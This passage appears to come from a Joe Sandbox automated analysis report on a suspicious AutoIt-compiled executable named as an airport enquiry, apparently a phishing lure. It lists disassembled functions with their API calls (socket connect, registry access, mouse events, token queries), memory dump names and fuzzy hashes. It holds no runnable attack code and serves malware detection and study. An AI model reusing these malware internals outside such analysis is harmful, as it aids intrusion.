            Function 00CF6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CF80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CF80CB
            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CF64D9
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF64E8
            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CF6521
            • connect.WSOCK32(00000000,?,00000010), ref: 00CF652A
            • WSAGetLastError.WSOCK32 ref: 00CF6534
            • closesocket.WSOCK32(00000000), ref: 00CF655D
            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CF6576
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
            • String ID:
            • API String ID: 910771015-0
            • Opcode ID: 2c9a5fb5ee44c58bb60228590c0e98a01bf8cb777d687bd331b946f2cf76e7f6
            • Instruction ID: 5310e0985d43d7f60005b6ba1888fe690a5de87239a3092b0b3b94482c6a95c6
            • Opcode Fuzzy Hash: 2c9a5fb5ee44c58bb60228590c0e98a01bf8cb777d687bd331b946f2cf76e7f6
            • Instruction Fuzzy Hash: ED31B371600218AFDB50EF64CC85BBE7BB9EF44714F148069FA19E7291CB74AD04DBA2
            Function 00CDE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CDE0FA
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CDE120
            • SysAllocString.OLEAUT32(00000000), ref: 00CDE123
            • SysAllocString.OLEAUT32 ref: 00CDE144
            • SysFreeString.OLEAUT32 ref: 00CDE14D
            • StringFromGUID2.OLE32(?,?,00000028), ref: 00CDE167
            • SysAllocString.OLEAUT32(?), ref: 00CDE175
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
            • String ID:
            • API String ID: 3761583154-0
            • Opcode ID: 0020e75511a25f70d319f7fc83607db3a31026974ca574a4bc5e1dae82944cff
            • Instruction ID: c38662c7892f2e3aa8a126399417794ed9a25bda0bd9058a681baf0a76fcfa37
            • Opcode Fuzzy Hash: 0020e75511a25f70d319f7fc83607db3a31026974ca574a4bc5e1dae82944cff
            • Instruction Fuzzy Hash: E2217735604209AFDB20BFA9DC88DAB77ECEB09760B108126FA55CB761DA70DD41CB64
            Function 00CDFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wcsnicmp
            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
            • API String ID: 1038674560-2734436370
            • Opcode ID: 92032145f7ff2024f6be9529021b579e2bf464a7114d7fe6a2c471ca3409e2ad
            • Instruction ID: 2878de8581054f0a4999e88e9b4c648a37bed6c8fc5b75d13f02746a3ed0a391
            • Opcode Fuzzy Hash: 92032145f7ff2024f6be9529021b579e2bf464a7114d7fe6a2c471ca3409e2ad
            • Instruction Fuzzy Hash: 992128321141557BD330A624DC12EB77398FF52344F14403BFA9786281EB519E93A2A5
            Function 00D0783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C81D73
              • Part of subcall function 00C81D35: GetStockObject.GDI32(00000011), ref: 00C81D87
              • Part of subcall function 00C81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C81D91
            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D078A1
            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D078AE
            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D078B9
            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D078C8
            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D078D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CreateObjectStockWindow
            • String ID: Msctls_Progress32
            • API String ID: 1025951953-3636473452
            • Opcode ID: 50dba222bd2070d242e53326e0a0b35858432f5018a21e9f55976bdd09101bac
            • Instruction ID: 70a363491ae9cf76e5175cbe9ef44728bf94e84e5cc9f043709d1fd3f7bfab89
            • Opcode Fuzzy Hash: 50dba222bd2070d242e53326e0a0b35858432f5018a21e9f55976bdd09101bac
            • Instruction Fuzzy Hash: 01118EB2510219BFEF159F60CC85EE77F6DEF08768F018115BA08A60A0C772AC21DBB4
            Function 00CA41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00CA4292,?), ref: 00CA41E3
            • GetProcAddress.KERNEL32(00000000), ref: 00CA41EA
            • EncodePointer.KERNEL32(00000000), ref: 00CA41F6
            • DecodePointer.KERNEL32(00000001,00CA4292,?), ref: 00CA4213
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
            • String ID: RoInitialize$combase.dll
            • API String ID: 3489934621-340411864
            • Opcode ID: 647b0b63484ef383e930aac4e96935f62f260aedfd144bd9e84fb4dbe0822d58
            • Instruction ID: cdbf1db3d3bef6ca314c038292e5bc5e3ecd7b49eb3e5ead40b5b79eefa45154
            • Opcode Fuzzy Hash: 647b0b63484ef383e930aac4e96935f62f260aedfd144bd9e84fb4dbe0822d58
            • Instruction Fuzzy Hash: 22E01AF8A90381AFEB205FB0FC09B543AA4B766707F208424F525E56E0DBB554D58F30
            Function 00CA429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CA41B8), ref: 00CA42B8
            • GetProcAddress.KERNEL32(00000000), ref: 00CA42BF
            • EncodePointer.KERNEL32(00000000), ref: 00CA42CA
            • DecodePointer.KERNEL32(00CA41B8), ref: 00CA42E5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
            • String ID: RoUninitialize$combase.dll
            • API String ID: 3489934621-2819208100
            • Opcode ID: 3ea95e449889fd92f81808879996b0907c7f8b7a54978999bc778282cf2d7774
            • Instruction ID: a2c7653bec2d27b17c80b55acc5d9a33fe1825d7c312f8de293ef0ec4048e992
            • Opcode Fuzzy Hash: 3ea95e449889fd92f81808879996b0907c7f8b7a54978999bc778282cf2d7774
            • Instruction Fuzzy Hash: A0E0B67C581301AFEB209F60FC0EB563AA4B726B56F304128F015E1AA0CBB545D4CA34
            Function 00CE675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove$__itow__swprintf
            • String ID:
            • API String ID: 3253778849-0
            • Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
            • Instruction ID: e9ba57d0d0cbd47a0c8f1797bce893ccbe11fb2a00840eb25339c7a07f9c75a3
            • Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
            • Instruction Fuzzy Hash: AE61CD3051029A9BCF11FF61CC82EFE37A8AF5534CF084519F85A6B292EB34AD41EB50
            Function 00D0046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00D010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00548
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D00588
            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00D005AB
            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D005D4
            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D00617
            • RegCloseKey.ADVAPI32(00000000), ref: 00D00624
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
            • String ID:
            • API String ID: 4046560759-0
            • Opcode ID: 390013dda8650a774cfbce96145da2ba273c10bcc1d7e4907d1f5d266ef6f4ee
            • Instruction ID: c3d46f8149b238cccc9fa592f494399c6bff2509f36f100ef890de867e90aec3
            • Opcode Fuzzy Hash: 390013dda8650a774cfbce96145da2ba273c10bcc1d7e4907d1f5d266ef6f4ee
            • Instruction Fuzzy Hash: B8514831108200AFCB14EB64C885F6FBBE9FF89714F18491DF599872A1DB71E905EB62
            Function 00D05A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
            Download Yara Rule
            APIs
            • GetMenu.USER32(?), ref: 00D05A82
            • GetMenuItemCount.USER32(00000000), ref: 00D05AB9
            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D05AE1
            • GetMenuItemID.USER32(?,?), ref: 00D05B50
            • GetSubMenu.USER32(?,?), ref: 00D05B5E
            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00D05BAF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Item$CountMessagePostString
            • String ID:
            • API String ID: 650687236-0
            • Opcode ID: 909e426fcccc6f113d2141173abf700f0163ceed1bba233582df79345f60c2c9
            • Instruction ID: 60e53c30b31287e4875cfb91588f938a612fe93b7dcff46cdbf6e7074446af10
            • Opcode Fuzzy Hash: 909e426fcccc6f113d2141173abf700f0163ceed1bba233582df79345f60c2c9
            • Instruction Fuzzy Hash: 51516C35A00615AFCB11AFA4D845BAEB7B4EF48314F144469EC5AA7391CB70BE41DFA0
            Function 00CDF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(?), ref: 00CDF3F7
            • VariantClear.OLEAUT32(00000013), ref: 00CDF469
            • VariantClear.OLEAUT32(00000000), ref: 00CDF4C4
            • _memmove.LIBCMT ref: 00CDF4EE
            • VariantClear.OLEAUT32(?), ref: 00CDF53B
            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CDF569
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$Clear$ChangeInitType_memmove
            • String ID:
            • API String ID: 1101466143-0
            • Opcode ID: cdbe361b74f3b20101615c44476dacfa8377ba10d4214ca501d037bcb150172b
            • Instruction ID: 0ed8c7f6c123e0e6708b3ca163cb585c0382f4aeea560ceed7e2ff20d12005fd
            • Opcode Fuzzy Hash: cdbe361b74f3b20101615c44476dacfa8377ba10d4214ca501d037bcb150172b
            • Instruction Fuzzy Hash: 13515D75A002099FCB10CF58D884AAAB7F8FF4C314B15816AEE59DB301E730E952CB60
            Function 00CE26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CE2747
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE2792
            • IsMenu.USER32(00000000), ref: 00CE27B2
            • CreatePopupMenu.USER32 ref: 00CE27E6
            • GetMenuItemCount.USER32(000000FF), ref: 00CE2844
            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CE2875
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
            • String ID:
            • API String ID: 3311875123-0
            • Opcode ID: b362be6c53b22af0fc08574344b949d3aaae54098ea7896ad42314c6408f9d32
            • Instruction ID: 7acc8555efddf57552d05d2650d6e8f4f5d1278df157cfc5e2c269909002dc5a
            • Opcode Fuzzy Hash: b362be6c53b22af0fc08574344b949d3aaae54098ea7896ad42314c6408f9d32
            • Instruction Fuzzy Hash: 90518F71A00385DBDF34CF6AD888BAEBBF9BF44314F104169E4259B2D1D7709A44CB51
            Function 00C81765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C8179A
            • GetWindowRect.USER32(?,?), ref: 00C817FE
            • ScreenToClient.USER32(?,?), ref: 00C8181B
            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C8182C
            • EndPaint.USER32(?,?), ref: 00C81876
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: PaintWindow$BeginClientLongRectScreenViewport
            • String ID:
            • API String ID: 1827037458-0
            • Opcode ID: 9afc8a8c0f9fa09726fbdc80d84eb5727c5fb023416e22eef547f329e9dea0c0
            • Instruction ID: f654dac4477c74cc74df18fc5708cc55078231062c4a3ebc92c48c2c03216371
            • Opcode Fuzzy Hash: 9afc8a8c0f9fa09726fbdc80d84eb5727c5fb023416e22eef547f329e9dea0c0
            • Instruction Fuzzy Hash: 4C4180705043009FD710EF25CC85FB67BE8EB46728F180629F9A9C62E1C7719D46DB62
            Function 00D0B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
            Download Yara Rule
            APIs
            • ShowWindow.USER32(00D467B0,00000000,01655828,?,?,00D467B0,?,00D0B862,?,?), ref: 00D0B9CC
            • EnableWindow.USER32(?,00000000), ref: 00D0B9F0
            • ShowWindow.USER32(00D467B0,00000000,01655828,?,?,00D467B0,?,00D0B862,?,?), ref: 00D0BA50
            • ShowWindow.USER32(?,00000004,?,00D0B862,?,?), ref: 00D0BA62
            • EnableWindow.USER32(?,00000001), ref: 00D0BA86
            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00D0BAA9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Show$Enable$MessageSend
            • String ID:
            • API String ID: 642888154-0
            • Opcode ID: b5ee691ac59416f61125cf623f0fbefc53d8acf22056cca81955ad1f35e85e4a
            • Instruction ID: ea3b48fca2240a7c8b0cec4aa9cd633615bdc9237a0469810be20156285a411e
            • Opcode Fuzzy Hash: b5ee691ac59416f61125cf623f0fbefc53d8acf22056cca81955ad1f35e85e4a
            • Instruction Fuzzy Hash: 81414E30604641AFDB22CF19D489B957BE0FB05320F1C42AAEA4C8F6A2C771A845CB71
            Function 00CF73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32(?,?,?,?,?,?,00CF5134,?,?,00000000,00000001), ref: 00CF73BF
              • Part of subcall function 00CF3C94: GetWindowRect.USER32(?,?), ref: 00CF3CA7
            • GetDesktopWindow.USER32 ref: 00CF73E9
            • GetWindowRect.USER32(00000000), ref: 00CF73F0
            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CF7422
              • Part of subcall function 00CE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
            • GetCursorPos.USER32(?), ref: 00CF744E
            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CF74AC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
            • String ID:
            • API String ID: 4137160315-0
            • Opcode ID: 3ac63eb4220ed449a00458eb8712d506e2e0d4f56da9fc2cd3240941246bbec6
            • Instruction ID: 7efc97fcfd72a498d9c43fbb003e0b84f0f672b98cea9fc99318859d493eecd0
            • Opcode Fuzzy Hash: 3ac63eb4220ed449a00458eb8712d506e2e0d4f56da9fc2cd3240941246bbec6
            • Instruction Fuzzy Hash: 9431D472508309ABD720DF14DC49F6BBBA9FF88314F100A19F599D7191CA70EA09CB92
            Function 00CD8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD8608
              • Part of subcall function 00CD85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD8612
              • Part of subcall function 00CD85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD8621
              • Part of subcall function 00CD85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD8628
              • Part of subcall function 00CD85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD863E
            • GetLengthSid.ADVAPI32(?,00000000,00CD8977), ref: 00CD8DAC
            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CD8DB8
            • HeapAlloc.KERNEL32(00000000), ref: 00CD8DBF
            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CD8DD8
            • GetProcessHeap.KERNEL32(00000000,00000000,00CD8977), ref: 00CD8DEC
            • HeapFree.KERNEL32(00000000), ref: 00CD8DF3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
            • String ID:
            • API String ID: 3008561057-0
            • Opcode ID: 21fc1a32c40dfbceff37fde892788e2b03b10004220260c633ddcb090ef983c4
            • Instruction ID: 91acbe6aa6cd8bbe32e31dbdd9d5906f7c14ad15ee29a465c0d2861100892a0b
            • Opcode Fuzzy Hash: 21fc1a32c40dfbceff37fde892788e2b03b10004220260c633ddcb090ef983c4
            • Instruction Fuzzy Hash: A811CD31500706EBDB209F64CC08BAE77BAEB54315F20402AE989D3390CB319A08CB70
            Function 00CD8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CD8B2A
